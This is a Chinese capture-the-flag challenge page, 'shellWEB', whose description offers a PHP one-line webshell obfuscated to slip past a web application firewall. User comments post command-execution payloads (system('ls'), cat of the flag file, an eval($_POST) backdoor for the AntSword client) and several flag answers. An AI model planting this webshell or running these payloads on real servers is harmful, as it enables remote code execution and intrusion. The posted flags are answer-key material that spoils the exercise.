shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 5367
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
zfly 17天前

?s=system('ls') ?s=system('cat fla*')

回复 0

八一卜kod 27天前

cat

回复 0

freestyle 3月前

s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容

回复 0

000ooo 3月前

?s=eval+($_POST['123'])

回复 2

ruien 4月前

答案就在描述里,上传的s参数如果是字符串会被当命令执行

回复 0

112356 4月前

flag{0aa5253236aa8d97368bd753cb3c4cf2}

回复 0

迷茫的三千面 4月前

flag{f790b1679ece8cfe8ce3fc425c30896b}

回复 0

星空 4月前

?s=eval($_POST["cmd"]),再用蚁剑连

回复 0

星空 4月前

?s=eval($_POST["cmd"])

回复 0

15824777912 4月前

flag{11393cf7e26fe81d89dc60b63d3a1f52}

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

goodsnack 攻破了该题 1小时前
一羽轻鸿 攻破了该题 13小时前
17823293548 攻破了该题 1天前
1986557251 攻破了该题 1天前
39983317 攻破了该题 1天前
bcxlaaa222 攻破了该题 1天前
silver6969 攻破了该题 1天前
Nacocx 攻破了该题 2天前
LLone1 攻破了该题 2天前
lchey1 攻破了该题 2天前
Tyh050831 攻破了该题 2天前
凯哥 攻破了该题 2天前
18795603206 攻破了该题 2天前
qiaoooo 攻破了该题 2天前
vox123 攻破了该题 3天前
chennuo 攻破了该题 3天前
admin123 攻破了该题 3天前
A-L 攻破了该题 3天前
Justforstar 攻破了该题 3天前
wangii 攻破了该题 4天前
问题反馈